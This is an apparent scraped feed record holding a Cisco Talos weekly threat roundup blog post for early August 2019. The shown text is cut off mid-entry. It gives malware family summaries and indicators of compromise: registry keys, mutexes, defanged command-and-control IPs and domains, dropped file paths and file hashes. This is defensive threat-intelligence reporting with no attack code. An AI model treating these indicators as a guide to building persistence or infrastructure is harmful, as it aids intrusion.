\\- (61) \nAggah dropper technique has been detected. The Aggah campaign has been observed dropping Azorult, LokiBot and other malware families. Aggah employs phishing and process hollowing to infect victim machines. \n \n", "modified": "2019-10-11T08:45:39", "published": "2019-10-11T08:45:39", "id": "TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nfy1VpFBlhE/threat-roundup-1004-1011.html", "type": "talosblog", "title": "Threat Roundup for October 4 to October 11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-09T21:34:08", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 2 and Aug. 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d4dc7d3de3f5.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.Swisyn-7105182-0 | Malware | Swisyn is a family of trojans that disguises itself as system files and services, and is known to drop follow-on malware on an infected system. Swisyn is often associated with rootkits that further conceal itself on an infected machine. \nWin.Worm.Phorpiex-7104335-2 | Worm | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide-range of payloads, from malware to send spam emails to ransomware and cryptocurrency miners. \nWin.Malware.Zusy-7102354-1 | Malware | Zusy is a trojan that uses Man-in-the-Middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as \"explorer.exe\" and \"winver.exe\". When the user access a banking website, it displays a form to trick the user into submitting personal information. \nWin.Worm.Brontok-7102096-1 | Worm | Brontok is an email worm that can copy itself onto USB drives. It can change system configuration to weaken its security settings, conduct distributed denial-of-service attacks, and perform other malicious actions on the infected systems. \nWin.Worm.Socks-7102087-0 | Worm | Socks is a generic worm that spreads itself via autorun.inf files and downloads follow-on malware to infected systems. \nWin.Malware.Formbook-7102043-1 | Malware | Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard. \nWin.Malware.Tofsee-7101989-1 | Malware | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Malware.Chthonic-7101817-1 | Malware | Chthonic is a banking trojan derived from the Zeus family of banking malware. It is typically spread via phishing emails and attempts to steal sensitive information from an infected machine. Chthonic has also been observed downloading follow-on malware such as Azorult, another information stealer. \nWin.Malware.Remcos-7101023-0 | Malware | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.Swisyn-7105182-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: Type ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: ErrorControl ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: ImagePath ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: DisplayName ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: WOW64 ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: ObjectName ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: Description ` | 9 \nMutexes | Occurrences \n---|--- \n`xinduanyou` | 9 \n`Global\\aca756c1-b9e5-11e9-a007-00501e3ae7b5` | 1 \n`Global\\ad6324e1-b9e5-11e9-a007-00501e3ae7b5` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ZFT[.]QBAIDU[.]INFO` | 5 \n`che[.]qianma[.]info` | 4 \nFiles and or directories created | Occurrences \n---|--- \n`\\SfcApi` | 9 \n`%SystemRoot%\\inf\\oem13.PNF` | 9 \n`%SystemRoot%\\inf\\oem13.inf` | 9 \n`%SystemRoot%\\LastGood\\TMP4.tmp` | 9 \n`%SystemRoot%\\LastGood\\system32\\DRIVERS\\winyyy.sys (copy)` | 9 \n`%SystemRoot%\\Temp\\OLD5.tmp` | 9 \n`%SystemRoot%\\inf\\INFCACHE.0` | 9 \n`%SystemRoot%\\inf\\INFCACHE.1 (copy)` | 9 \n`%SystemRoot%\\stin.bat` | 9 \n`%System32%\\DRIVERS\\winyyy.sys (copy)` | 9 \n`%System32%\\drivers\\SET3.tmp` | 9 \n`%System32%\\drivers\\SET6.tmp` | 9 \n`%SystemRoot%\\winsys.exe` | 9 \n`%SystemRoot%\\winsys.inf` | 9 \n`%SystemRoot%\\winyyy.sys` | 9 \n`%SystemRoot%\\SMSS.bat` | 8 \n`%SystemRoot%\\lsass.exe` | 8 \n`%SystemRoot%\\winhost.exe` | 8 \n`%SystemRoot%\\SysWOW64\\SMSS.bat` | 1 \n`%SystemRoot%\\SysWOW64\\lsasys.exe` | 1 \n`%SystemRoot%\\SysWOW64\\winhost.exe` | 1 \n`%System32%\\SMSS.bat` | 1 \n`%System32%\\lsasys.exe` | 1 \n`%System32%\\winhost.exe` | 1 \n \n#### File Hashes\n\n` 0f502626053f598a870375325ba7f7c81c2a791d0fd2401d4d6bd27c784b5f90 37e5a76ef3b1de92c162fb42b6e783a9734ccb1d4f61e1252ec9a8aba6417ca2 64b2a00a400501b742eb336eceee3a398b418315ed676e37e4d4f3fc7ab76e2c 722449fd99d698856b809df09e75e79ec4cee7840960e3df72a8ceb3d954134c 729d483257c6907c3f423d344f2cb5c9a78a899455ef246fc033c965043272bb 96d5ea254ca506622c2c70c4bcb8594c62a20db7ce9552deb302166bda37b226 b784fc881fb56dceeaad3afbad770a3c76eaa1acc389877be514af02413c06e7 d8318b7b34f4662ee8b6b537ee08f763ffb7d2c4794b722561d305db65c6fc5f da0c26355fd7abdd3683beb7ab9f96efdec52207c150664bd177de4d794e6a53 de782ca97daf89c1208ea57618498de7aaa6f4ddbbc9794f3491dc947cca8cc3 e4aeeaf8b385bfccc637411b5030ab6c91a289cff425a14953e6549073478aa0 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ajlIu0FYI9E/XU3L9-R0w0I/AAAAAAAACSY/aBJBUgQnH1Uv1y2g0CPGmKSxXP3HWi94QCLcBGAs/s1600/d8318b7b34f4662ee8b6b537ee08f763ffb7d2c4794b722561d305db65c6fc5f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-pjqrtZHB_jA/XU3MOx0rp_I/AAAAAAAACSg/fHnank7YJ80mC9cHYud--e4jjow9m_yigCLcBGAs/s1600/64b2a00a400501b742eb336eceee3a398b418315ed676e37e4d4f3fc7ab76e2c_tg.png>)\n\n \n\n\n \n\n\n### Win.Worm.Phorpiex-7104335-2\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Windows\\M-5050402520507690204050\\winmgr.exe ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Manager ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Manager ` | 15 \nMutexes | Occurrences \n---|--- \n`t1100` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`195[.]22[.]26[.]248` | 15 \n`199[.]247[.]8[.]13` | 15 \n`208[.]100[.]26[.]250` | 14 \n`216[.]218[.]206[.]69` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`srv1300[.]ru` | 15 \n`srv1000[.]ru` | 15 \n`srv1100[.]ru` | 15 \n`srv1200[.]ru` | 15 \n`srv1400[.]ru` | 6 \nFiles and or directories created | Occurrences \n---|--- \n`\\autorun.inf` | 15 \n`\\Secret.exe` | 15 \n`\\Documents.exe` | 15 \n`\\Pictures.exe` | 15 \n`\\505050.exe` | 15 \n`\\Movies.exe` | 15 \n`\\Music.exe` | 15 \n`\\Private.exe` | 15 \n`\\windrv.exe` | 15 \n`E:\\autorun.inf` | 15 \n`E:\\Secret.exe` | 15 \n`E:\\505050.exe` | 15 \n`E:\\Documents.exe` | 15 \n`E:\\Movies.exe` | 15 \n`E:\\Music.exe` | 15 \n`E:\\Pictures.exe` | 15 \n`E:\\Private.exe` | 15 \n`E:\\windrv.exe` | 15 \n`%APPDATA%\\winmgr.txt` | 15 \n`D:\\autorun.inf` | 15 \n`%SystemRoot%\\M-5050402520507690204050` | 15 \n`%SystemRoot%\\M-5050402520507690204050\\winmgr.exe` | 15 \n \n#### File Hashes\n\n` 45dd665a06a9f87ec8ad562e6678a8384e0950bedba7beebba9c905157d1be52 4890d7aa8b302210932dacef3a0452ada7ee9c6565b1175f75925915e6036331 4ae81c49804d96d6913fc91ec79c77c0a16f09a5628cd9e6365bb621217ed3c9 5327d5502aa0e6cb6456809fc27cfcd1b0830a9cfd337d2a9493ec47a2eb6530 81489692294fa6e70b73f959a30a7bdd684141a72d3153b409f45173753acb82 8b66de0f1099ff243fbea1782c0ab7566bb9a201818d7793641e797c52067cab 8c03c0f22d09ba5384b804eced1c56e74f6c6df97d35a21f0d596dc2c80e5f5c 90b7e12af41916b8c82d0d83f6073e5bbc95f3c4ff1fd29391d50e7115967460 a0287b2bc66e1f6695d9c7e4ad6f70e8b1099f3f4b9761a4428e8ff02b173962 a80da89dfba6049d759500b272030ea7a97ab0d7cbe386456ddb65fa24b7f738 ce79b0e5a78be79315d2f20c6998812b75f4b95646d457034b4a534467e71558 d3da28644ddeaa70d828a659e27b83abcc284e578a62c26d1a4efc418cdac942 d6a90b5ff319cf5eb51d7b202c77e7e8037d2b160b80807e027ceb2e9834a29e d8797103159c7ebf48b8ff67033f61866b1e46f70f82a91ce33b8afe27f0252e e571c9202cd58870434c981bc0cf546473c446145d77362b1fdf7eb75f18400c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4gCuLjJZARg/XU3M0QenW_I/AAAAAAAACSs/TQl5RkYJBtswmAhtQ723UfoeHGlhirINwCLcBGAs/s1600/45dd665a06a9f87ec8ad562e6678a8384e0950bedba7beebba9c905157d1be52_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-jqgxgbtThtU/XU3M6tGW1KI/AAAAAAAACSw/uyMy5CFE3E4Yeui93PYEdMj_7C8OQEzRgCLcBGAs/s1600/45dd665a06a9f87ec8ad562e6678a8384e0950bedba7beebba9c905157d1be52_tg.png>)\n\n \n\n\n \n\n\n### Win.Malware.Zusy-7102354-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: F5DBF765 ` | 20 \nMutexes | Occurrences \n---|--- \n`F5DBF765` | 25 \n`\\BaseNamedObjects\\5145C9BD` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]218[.]185[.]162` | 23 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ynefefyopqvu[.]com` | 17 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\5145C9BD\\bin.exe` | 23 \n`%HOMEPATH%\\AppData\\LocalLow\\F5DBF765` | 22 \n`%APPDATA%\\F5DBF765` | 21 \n`%APPDATA%\\F5DBF765\\bin.exe` | 20 \n \n#### File Hashes\n\n` 03e74e58f2aed047d6bac9bde066206c64d3e48a4c865d86e29bc62edbb19c77 0eb478d5757cb872b80386250de948ac3abc76b5ebf0d7f2ab38f6a6ad95479c 0f779f8c2d4d342da2fc6bda22eb75bcc3939102ecea72847fafd9cbc10e26ad 1ed3291baf7d32ab690b56f430399d7c46d261176c5b05b3cf8f2cdd1f9a4681 2828b72f4856b8054ff75af987aa43d84f2d42405979c99e89e6082afc47d6da 2bcd2e02bf0cefed898990ae64791f9c294c50695542e2cf0e073c1f12dfed94 2bf93320c70c222aa89db3df81845d9277dc8eb7ff764b63f5ad4c5b78839557 2ecbe3620a6f08eadaf5c14aa35b2975b07ee41827f7004b692a7508b6a3c1a5 354d64a310cc3ce7a957c29f8654201ee0e79237609172e746aa25b5e038b837 3776eb64c25acfc28fd35fe6a123a0b4b1e0ee7e4ff2cde20169f1a914c01df1 39627480021a400069ee270b040601af19aaaf669bc6db2bf64058e14fb13875 3d0a697fec4326426bf22ae6b848700a3274c55767fb18a8e0748fc7f3024597 3e7ed99b45129a136287f785dffb67b044da28fd2232190fafc30c759c447a96 460de49bf98a472753462a9264bf40ea24b95fa667f3b8d7d010ca3fa94b715a 47e8ec99e3c0bb7526b381db1bec98b13df1deb95c56868703309bf4979155d2 48a0d3749139aebb4d435db7158aa1916e4d305139d3db168c795c68b9431ed6 4c46b50c94ad30df7661d5be4eaf3da8ed1f8f1924fa25f0b87f9e2bc5b21dc8 4cad121b0408001868b22b92d7def0a3125efe64ebd5d28bfbd933395fecf512 5ecd70109eec90c8ac0869398a4da72f9264ef5f3f61f2be883456ddd9bc6a32 62a2d6d129e578279b691542eea61040212cc4f26855beecd991118343d081cf 62afaeae9d1bc8473416423c46423951eb35cac6927798f6d9967a8fb358af2a 6b2d254b662c18e9a23fead0e661587c3f46b8fc8fac940fedb13e4e2b3d8bd6 6f3c9f7a94b4f3a3ecf29bcd646a55bb3d286ffd20b98fe2d984594dd73dbb5e 72683fb9644dbdc7d2fc1ba436d7f7379f2ce86fe3dac5431d29160abff07755 72c16952c7f016b6bbac0e1cc243aec6d9eacb1c1db8c3f744499584672580e5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n \n\n\n \n\n\n[](<https://1.bp.blogspot.com/-aD_k9wBvi7w/XU3OYgRNxzI/AAAAAAAACTE/3w3xcf2QATk_BEJh8RtyvkiiDtllPMsBgCLcBGAs/s1600/0f779f8c2d4d342da2fc6bda22eb75bcc3939102ecea72847fafd9cbc10e26ad_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-cpk0yyrdwN4/XU3OPhFRCgI/AAAAAAAACTA/rC6sU_cduvklwg5FVfCZE2U4ofFcwgt-gCEwYBhgL/s1600/0f779f8c2d4d342da2fc6bda22eb75bcc3939102ecea72847fafd9cbc10e26ad_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-0irmTmU9_zU/XU3PF6lOpfI/AAAAAAAACTQ/2MVcL7sl9Gc2HccPLyTh_K3HnilzUwjRgCLcBGAs/s1600/03e74e58f2aed047d6bac9bde066206c64d3e48a4c865d86e29bc62edbb19c77_umbrella.png>)\n\n \n\n\n \n\n\n### Win.Worm.Brontok-7102096-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: ScreenSaverIsSecure ` | 25 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: ScreenSaveTimeOut ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: NoTrayContextMenu ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CABINETSTATE \nValue Name: FullPathAddress ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: HideFileExt ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: NoViewContextMenu ` | 25 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableRegistryTools ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: DisallowRun ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: NoTrayItemsDisplay ` | 25 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: nEwb0Rn ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: n3wb012nAdministrator ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: n210bw3n ` | 25 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT \nValue Name: AlternateShell ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Shell ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Userinit ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\AEDEBUG \nValue Name: Debugger ` | 25 \n`<HKLM>\\SOFTWARE\\CLASSES\\LNKFILE\\SHELL\\OPEN\\COMMAND ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION \nValue Name: RegisteredOrganization ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION \nValue Name: RegisteredOwner ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: NoFileAssociate ` | 25 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: NoFileAssociate ` | 25 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: DisallowRun ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\DISALLOWRUN \nValue Name: 1 ` | 25 \nMutexes | Occurrences \n---|--- \n`Local\\MSCTF.Asm.MutexWinlogon2` | 25 \n`Local\\MSCTF.CtfMonitorInstMutexWinlogon2` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`51[.]141[.]32[.]51` | 24 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`time[.]microsoft[.]akadns[.]net` | 24 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\winevt\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx` | 25 \n`%HOMEPATH%\\Local Settings\\Application Data\\winlogon.exe` | 24 \n`%SystemRoot%\\nEwb0Rn.exe` | 22 \n`%System32%\\DamageControl.scr` | 22 \n`%System32%\\JawsOfLife.exe` | 22 \n`\\nEwb0Rn.exe` | 22 \n`\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\Empty.pif` | 21 \n`%HOMEPATH%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE` | 21 \n`%HOMEPATH%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE` | 21 \n`%HOMEPATH%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE` | 21 \n`%HOMEPATH%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE` | 21 \n`%HOMEPATH%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE` | 21 \n`%System32%\\WishfulThinking.exe` | 21 \n`\\about.htm` | 18 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif` | 2 \n`%SystemRoot%\\msvbvm60.dll` | 2 \n`E:\\Download Administrator.exe` | 2 \n`E:\\MP3[NEW-RELEASE].exe` | 2 \n`E:\\nEwb0Rn\\New Folder.exe` | 2 \n`\\Download Administrator.exe` | 2 \n`\\Friendster Blog.exe` | 2 \n`\\MP3[NEW-RELEASE].exe` | 2 \n`\\Mini Games.exe` | 2 \n`\\StyleXP-WindowsVistaPack.exe` | 2 \n`%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE` | 2 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 642e0acdbece0f1e99604f63488e2d0ae4845080adba80ecfc55cbc95db05bc5 73fcbb6f10cd849bff109dd05cf89d9b612302faed9c382791d6df4d024bc009 7e98f0308fd88e97e4f80b1e2c6845e18186e07d2a27d936bccadad719114334 809f403efb1c7f19a30cfdd62841b898ebfbc1e91626928bb372ad630d8d9b81 81dc5726d4af65258dec6ccf0dda1327fcacb9b950539992fff82859c6645a27 85506de211f0441c3bbf0e98668a7d3d1c2a62aadc07ef82968245644fca4b00 8ef7ee2b458b006e3364f972a744031cb99c9a9d7bb4329b4a41e6d0e1cbb784 96093b99c83298eeb0aa6ac9a9c006f23ad8d8c1818b8a88c62ea1f88fd7d368 9784b14130ecabb2d53ea4226e79f6dca68e9bf31a83cc447a0113464582a5df 99da8c945884ce7e214aba8f0b363532082d660bae2693c098b230701d236b7b 9b4eabfb075dd32ce295b7dab5a0347f7c5f89021c8804cf88152b0be7de1544 9bf0202ddec81f84ad07867e28214decfef7fd5bd1327a6b9482de823d90ff60 9da800449b88fbc076c16d4fa6d42645367e9b0e1c3306ad5f65df77b3348a72 9de658e0f67bdcae688d74907763d87f280086e5c47cc0c2ee545f8cf675a42d a2cbadc9bb11b4174d11407599ae95ee3680054e04105b0ef435628dcc252954 a84944ae92cc5732281c71ffa5b17b68ee362441bc8093da4d59bc0ca5723f74 a86c3e90ba9c53348dde346e5bebf63d8198dafabf82baaf298f5b8c23ff4fa8 b36b7ceef1d16e877580931a8ec5a70462f0513a4d113bcb1e3e198830aa3447 c600cf8b855fefb4e9e1e4d0c1f0d92c58eee1f06d53a88b0d96ecac94e7dbfd c88906c44642322a0ad3fd0207e9873d89d16d15b317c0e51d1fed28138ce210 cba998582b123d210bccb81e49db805736439eba5f4735883d4597e2c5895f85 d296651dfc3d2d3f31115e48e815449bf71d06a64318462c1bd2f0e299d6a63f d38e3cfe3f57ddea4f4b8966b4b51812af1ac688849a8bbee086ec905f0406d1 d3a23ff88633039f39ea421a2d197e3b6d9bb26ad6e5500dfb559b126884fbac d5456a558e240fbe2e116155e4a04c8c038550ab4c2c4103d9e49da2a8ba495f `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-6ZWdcT_r_4k/XU3PWRqgACI/AAAAAAAACTY/Npr3WJrX8Lcl15wk-WT7x1jPZroJ3YqygCLcBGAs/s1600/642e0acdbece0f1e99604f63488e2d0ae4845080adba80ecfc55cbc95db05bc5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-pl-WqHJO3Ys/XU3PaLukIuI/AAAAAAAACTc/ivffFBlFSQIRzQt5PrLMGVfYC8jBWiPVQCLcBGAs/s1600/642e0acdbece0f1e99604f63488e2d0ae4845080adba80ecfc55cbc95db05bc5_tg.png>)\n\n \n\n\n \n\n\n### Win.Worm.Socks-7102087-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntuser ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoload ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SCHEDULE \nValue Name: ImagePath ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntuser ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoload ` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]100[.]26[.]251` | 11 \n`23[.]20[.]239[.]12` | 11 \n`104[.]25[.]37[.]108` | 8 \n`104[.]25[.]38[.]108` | 3 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]hugedomains[.]com` | 11 \n`fewfwe[.]com` | 11 \n`fewfwe[.]net` | 11 \n`static[.]HugeDomains[.]com` | 7 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\cftmon.exe` | 11 \n`%SystemRoot%\\SysWOW64\\drivers\\spools.exe` | 11 \n \n#### File Hashes\n\n` 16c60b7975280008e5491cae5e71fa48671be5c97010488faf63956c6552c628 44f3b28713682be10e02bdf52a99290b733931bac2e8c0b4102e4f458b1284bd 5943ca2e22ce53fcc9b7caabfca8d8cf721ccbd4f536833b10a370303fcaf505 7e9b3d25d766a1ff8520187b8f49387b1f654778ba58838e37e0ff741ab10f73 8dfb856841b2f70e2bffb74f26225dcc42d65d3fa6250767397ac30bf21823f5 a52c2e6216c1685d35385419c9c8cd854ea70490f923bbc3eaff92df26bafbc6 a73604e5b2456cc803dae1b79d91db32ce2535562bdc73eb762394540c79d7af b9510728d8c9d3807e26ba9286f3ab6890e335a197b377201b939230a3d6d69b c8a3ac87c01529800bd6461d94702428322c7a3aed93ed676f0a55d3d56addd9 e4c7f241397b5a46c3081214f1eb67b51bd6d5dd20cd984db4f5ac164f260bf1 fe80f9c59fc294d3a6fe8d973ea687f92daf1a6988e13a26bcec20f34f44ab25 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### 